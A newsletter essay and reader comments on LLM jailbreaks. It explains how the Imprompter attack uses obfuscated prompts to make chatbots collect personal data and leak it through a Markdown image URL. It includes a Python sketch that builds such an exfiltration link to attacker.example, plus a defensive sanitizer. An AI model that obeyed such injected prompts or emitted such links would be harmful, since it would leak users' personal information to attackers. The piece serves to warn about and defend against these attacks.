When it comes to security, LLMs are like Swiss cheese — and that’s going to cause huge problems
Two new examples that are quite disconcerting
The more people use LLMs, the more trouble we are going to be in. Two new examples crossed my desk in the last hour.
One concerns personal information, and the temptation some people (and some businesses) feel to share their information with LLMs. Sometimes even very personal information (e.g., with “AI girlfriends” and chatbots used as therapists).
Both concern jailbreaking: getting LLMs to do bad things by evading often simplistic guardrails.
A new paper from UCSD and Nanyang Technological University shows that simple prompts, like the one below (reprinted in WIRED), can get LLMs to collate and report personal information in a seriously nefarious way.
Matt Burgess at WIRED sums up how insidious this is concisely:
The Imprompter attacks on LLM agents start with a natural language prompt (as shown above) that tells the AI to extract all personal information, such as names and IDs, from the user’s conversation. The researchers’ algorithm generates an obfuscated version (also above) that has the same meaning to the LLM, but to humans looks like a series of random characters.
“Our current hypothesis is that the LLMs learn hidden relationships between tokens from text and these relationships go beyond natural language,” Fu says of the transformation. “It is almost as if there is a different language that the model understands.”
The result is that the LLM follows the adversarial prompt, gathers all the personal information, and formats it into a Markdown image command—attaching the personal information to a URL owned by the attackers. The LLM visits this URL to try and retrieve the image and leaks the personal information to the attacker. The LLM responds in the chat with a 1x1 transparent pixel that can’t be seen by the users.
The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing the unintelligible prompt might do something useful, such as improve their CV. The researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it was able to return the personal information contained within the file.
Scary.
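To make that concrete: the exfiltration step WIRED describes boils down to smuggling data through an image fetch. The sketch below is illustrative only, not the researchers’ code; the function name, field names, and attacker URL are all made up.

```python
# Illustrative sketch of the Markdown-image exfiltration pattern described
# above. Not the researchers' code; the URL and field names are hypothetical.
from urllib.parse import quote

def build_exfil_markdown(pii: dict, attacker_url: str = "https://attacker.example/p.png") -> str:
    """Pack extracted fields into a query string and wrap them in a Markdown
    image tag. When the chat client renders the Markdown it fetches the URL,
    so the query string (the personal data) lands in the attacker's logs,
    while the user sees only a tiny (e.g., 1x1 transparent) image."""
    payload = quote(";".join(f"{k}={v}" for k, v in pii.items()))
    return f"![a]({attacker_url}?d={payload})"

print(build_exfil_markdown({"name": "Jane Doe", "id": "12345"}))
# ![a](https://attacker.example/p.png?d=name%3DJane%20Doe%3Bid%3D12345)
```

The adversarial prompt’s only job is to get the model to emit a string shaped like this; everything after that is ordinary web plumbing.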
§
Meanwhile, companies like Google, Tesla, and Figure.AI are now stuffing jailbreak-vulnerable LLMs into robots. What could possibly go wrong?
Quite a lot, as a new paper from Penn shows, with many examples like this:
§
All that is just from stuff I read this morning.
And all of it was predictable. Jailbreaks aren’t new, but even after years of them, the tech industry has nothing like a robust response. Long-time readers of this newsletter might remember my February 2023 essay Inside the Heart of ChatGPT’s Darkness (subtitled Nightmare on LLM Street).
The essay opened as follows:
In hindsight, ChatGPT may come to be seen as the greatest publicity stunt in AI history, an intoxicating glimpse at a future that may actually take years to realize—kind of like a 2012-vintage driverless car demo, but this time with a foretaste of an ethical guardrail that will take years to perfect.
Nothing that has happened since changes that view.
§
Inside the Heart of ChatGPT’s Darkness ended with this warning:
So, to sum up, we now have the world’s most used chatbot, governed by training data that nobody knows about, obeying an algorithm that is only hinted at, glorified by the media, and yet with ethical guardrails that only sorta kinda work and that are driven more by text similarity than any true moral calculus. And, bonus, there is little if any government regulation in place to do much about this. The possibilities are now endless for propaganda, troll farms, and rings of fake websites that degrade trust across the internet.
It’s a disaster in the making.
Still true.
And now we have LLM-driven robots to worry about, too.
By empowering LLM companies and putting almost no effective guardrails in place, we as a society are asking for trouble.
Gary Marcus is the author of Taming Silicon Valley, and frankly wishes more people would read and share the book’s message on the need for community activism around AI. On the eve of the US general elections, he is quite concerned that nobody is really talking about tech policy, when so much is at stake.
Allow me to politely suggest that people who offer robots controlled by LLMs should be held strictly and personally liable for all harms caused by such robots as if the actions were performed with intent by the offeror.
There are actually quite a few scary things in that first paper. The visual version of the attack has the added advantage (for the attacker) that users aren't even alerted to the fact that they're entering unknown gibberish into the prompt.
The text versions from the paper look undecipherable, and a cautious (informed) user might refrain from entering them, just as a cautious user might refrain from clicking on a phishing link. But presumably the attack could be optimized to look less threatening (while still obscuring its purpose) as part of a larger "helpful" pre-made prompt. It could even be as simple as having the prompt pull a larger and more nefarious injection from an attacker's site. Maybe LLMs need a version of XSS security too.
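One way to read that last suggestion: treat model output the way web frameworks treat untrusted HTML, and sanitize it before rendering. The sketch below only illustrates that idea and is not a vetted defense; the allowlist and function name are hypothetical.

```python
# Illustrative output sanitizer in the spirit of XSS filtering: drop Markdown
# images whose host is not explicitly trusted, so a model response cannot
# silently phone home via an image fetch. The allowlist is hypothetical.
import re

ALLOWED_IMAGE_HOSTS = {"cdn.trusted.example"}
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://([^/\s)]+)[^)\s]*)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Replace image references to non-allowlisted hosts with a visible marker."""
    def _replace(match: re.Match) -> str:
        host = match.group(2).lower()
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(_replace, markdown)

print(strip_untrusted_images("![a](https://attacker.example/p.png?d=secret)"))
# [image removed]
```

Like XSS filters, this only closes one channel; it does nothing about the model being talked into gathering the data in the first place.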